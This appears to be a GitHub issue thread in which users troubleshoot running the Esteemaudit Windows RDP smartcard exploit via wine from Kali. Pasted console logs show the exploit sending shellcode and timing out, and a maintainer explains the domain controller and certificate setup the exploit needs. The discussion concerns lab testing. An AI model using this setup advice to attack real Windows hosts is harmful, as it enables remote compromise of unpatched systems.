[-] 10.0.0.42:3389 - The machine is not vulnerable!

[f4rb3r1o]

hi friend, well done about the effort ! i have a little problem. after looking at most of the issues and trying to solved it myself, i decided to write you. after following the whole process and debug fix some problems myself, i'm getting this message: [-] 10.0.0.42:3389 - The machine is not vulnerable! . when going to the containing folder and execute : wine Esteemaudit-2.1.0.exe i'm getting :

[*] Creating callback socket [+] Listening on 0.0.0.0:0 [+] Callback socket creation complete [+] Connected to target 10.0.0.42:3389 [+] Sending Space Bar [-] Connection timeout (exceeded computed threshold of 10.00 seconds) [-] Exploit NOT successful :-(

please help, regards.

[BlackMathIT]

Hi @liad1234, which OS is your target and it's on a domain or not?

[f4rb3r1o]

hi, the os is Windows XP Professional x64 Edition SP1 not on a domain.

[BlackMathIT]

@liad1234 the most rapid solution to testing the exploit is to virtualize two machine, a windows server edition from 2003 till 2012r2 to do as domain controller and a windows server 2003 or XP to do as Target. The exploit works only on a domain infrastructure, this is because it needs a CA to validate the certificate inside the logon request for smartcard authentication and it will create the callback needed to trigger the exploit. By default every domain controller applies a GPO that will authorize the machine target to log in with RDP smartcard logon.

[f4rb3r1o]

thank you very much, do you have maybe any link that describe the vulnerablity + the depndencies ? (sorry to bother)

[BlackMathIT]

https://researchcenter.paloaltonetworks.com/2017/05/unit42-dissection-esteemaudit-windows-remote-desktop-exploit/

Have fun! :)

[paibanezma]

Hi,

I am experiencing the same Connection Timeout problems:

root@kali:/usr/share/esteemaudit# wine Esteemaudit-2.1.0.exe [] Creating callback socket [+] Listening on 0.0.0.0:444 [+] Callback socket creation complete [+] Connected to target 192.168.55.100:3389 [+] Sending Space Bar [] Building exploit buffer. [+] Exploit buffer created. [+] Sending Enter key [+] SELECT_FILE - GPK Card MF [+] GET_RESPONSE - data unit size [+] GET_RESPONSE - serial number [+] SELECT_FILE - GPK Card MF [+] SELECT_FILE - Don't care which [+] GET_RESPONSE - from SELECT_FILE [+] READ_BINARY - unknown offset [+] SELECT_FILE - Don't care which [+] GET_RESPONSE - from SELECT_FILE [+] READ_BINARY - start of file [+] Shellcode sent [+] SELECT_FILE - GPK Card MF [*] First stage complete [-] Connection timeout (exceeded computed threshold of 10.00 seconds) [-] Exploit NOT successful :-(

My scenario is:

• Victim: Windows 2003 Server Standard R2 64 bits
• Domain Controller: Windows 2012 Server with Active Directory
• Attacker: Kali Linux

The Victim is accesible using RDP with administrator account.

It is a really interesting lab to work with this exploit. Well done!

Thanks a lot and I am looking forward your news.